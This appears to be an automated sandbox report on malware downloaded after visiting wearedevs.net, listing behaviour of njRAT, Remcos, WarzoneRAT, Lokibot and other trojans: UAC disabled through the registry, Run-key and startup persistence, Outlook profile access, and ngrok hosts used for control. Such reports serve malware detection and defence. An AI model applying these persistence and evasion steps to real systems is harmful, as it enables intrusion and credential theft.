Analysis Overview
Threat Level: Known bad
The file http://wearedevs.net was found to be: Known bad.
Malicious Activity Summary
njRAT/Bladabindi
UAC bypass
RevengeRAT
Lokibot family
Warzonerat family
Crimsonrat family
Njrat family
Lokibot
WarzoneRat, AveMaria
Revengerat family
CrimsonRAT main payload
Remcos family
CrimsonRat
Remcos
RevengeRat Executable
ReZer0 packer
Warzone RAT payload
Modifies Windows Firewall
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Reads user/profile data of web browsers
Obfuscated with Agile.Net obfuscator
Uses the VBS compiler for execution
Drops startup file
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Accesses Microsoft Outlook profiles
Probable phishing domain
Drops file in System32 directory
Suspicious use of SetThreadContext
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Browser Information Discovery
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of FindShellTrayWindow
Runs ping.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
outlook_win_path
outlook_office_path
Scheduled Task/Job: Scheduled Task
Modifies registry class
NTFS ADS
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-12-22 22:46
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-22 22:46
Reported
2024-12-22 22:52
Platform
win10v2004-20241007-en
Max time kernel
363s
Max time network
364s
Command Line
Signatures
CrimsonRAT main payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
CrimsonRat
Crimsonrat family
Lokibot
Lokibot family
Njrat family
Remcos
Remcos family
RevengeRAT
Revengerat family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
WarzoneRat, AveMaria
Warzonerat family
njRAT/Bladabindi
ReZer0 packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
RevengeRat Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CrimsonRAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\WarzoneRAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\WarzoneRAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CrimsonRAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CrimsonRAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Remcos.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\WarzoneRAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\CrimsonRAT.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe | C:\Users\Admin\Downloads\NJRat.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA | C:\Users\Admin\Downloads\NJRat.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe\:SmartScreen:$DATA | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe | C:\Users\Admin\Downloads\NJRat.exe | N/A |
Executes dropped EXE
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\"" | C:\Users\Admin\Downloads\Remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\remcos = "\"C:\\Windows\\SysWOW64\\Userdata\\Userdata.exe\"" | C:\Windows\SysWOW64\Userdata\Userdata.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." | C:\Users\Admin\Downloads\NJRat.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .." | C:\Users\Admin\Downloads\NJRat.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 0.tcp.ngrok.io | N/A | N/A |
| N/A | 0.tcp.ngrok.io | N/A | N/A |
| N/A | 0.tcp.ngrok.io | N/A | N/A |
| N/A | 0.tcp.ngrok.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\Userdata\Userdata.exe | C:\Users\Admin\Downloads\Remcos.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Userdata\Userdata.exe | C:\Users\Admin\Downloads\Remcos.exe | N/A |
| File created | C:\Windows\SysWOW64\Userdata\Userdata.exe:SmartScreen:$DATA | C:\Users\Admin\Downloads\Remcos.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Userdata | C:\Users\Admin\Downloads\Remcos.exe | N/A |
| File created | C:\Windows\SysWOW64\Userdata\Userdata.exe | C:\Users\Admin\Downloads\Remcos.exe | N/A |
| File created | C:\Windows\SysWOW64\Userdata\Userdata.exe | C:\Users\Admin\Downloads\Remcos.exe | N/A |
Probable phishing domain
| Description | Indicator | Process | Target |
| HTTP URL | https://sourceforge.net/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8f63ab484d4a63d1 | N/A | N/A |
Suspicious use of SetThreadContext
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Downloads\WarzoneRAT.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Userdata\Userdata.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\WarzoneRAT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\WarzoneRAT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NJRat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NJRat.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\svchost\svchost.exe\:SmartScreen:$DATA | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\svchost.exe\:SmartScreen:$DATA | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 389843.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 230875.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 242210.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 807091.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 770873.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\jFvfxe.exe\:SmartScreen:$DATA | C:\Users\Admin\Downloads\WarzoneRAT.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 44579.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 707347.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 185813.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\NJRat.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\DeltaExecutor\DeltaExecutor.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://wearedevs.net
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ea8346f8,0x7ff8ea834708,0x7ff8ea834718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2888 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
